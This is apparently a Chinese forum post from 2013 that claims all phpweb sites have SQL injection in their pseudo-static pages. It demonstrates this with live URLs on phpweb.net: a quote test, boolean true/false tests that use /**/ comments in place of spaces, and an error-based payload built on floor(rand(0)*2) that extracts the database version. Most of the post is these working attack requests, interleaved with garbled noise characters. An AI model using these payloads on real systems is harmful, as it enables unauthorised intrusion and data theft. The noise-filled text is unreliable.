phpweb所有的整站程序伪静态页面都存在sql注入
0 [. H% s* O. A5 d# v2 D. c# I3 C) L! H4 X$ W, V9 t- J4 ]
主站:http://phpweb.net/
5 |$ j6 n+ o2 k% ^3 n) f加’检测:# ^ @0 F+ D8 f2 b$ `$ t: |
3 b0 B& @5 W5 Q$ ahttp://www.phpweb.net/down/html/?772′.html& c4 J/ X6 ~5 b$ W9 U
/ l( @. g7 ]7 G& u! B出错+ }/ A; V9 P( t. Y
存在注入。! ]- {0 [/ t" g- R' g( q8 w2 Y- [
不能用空格,只能用/*罗
# h) z F! \5 b& n3 i8 q, yhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常4 f9 H3 W9 C. t: d
5 j" G0 f' [4 F
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.5 _4 X4 ?# G! {7 _' W, c
爆数据库版本:+ R8 ~& C# ~* D
6 k& H$ S3 h0 d/ ~0 o& F?
g2 o- G8 e3 g0 P( Y2 W1! ?' G W4 ?$ o: R6 |! g+ [
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html8 o+ B' w# w7 ^" t
更新日期: 2013-01-03 13:39:50 - P0 @' t. R5 v F
|
发表于 2013-1-4 19:46:42
收藏
支持
反对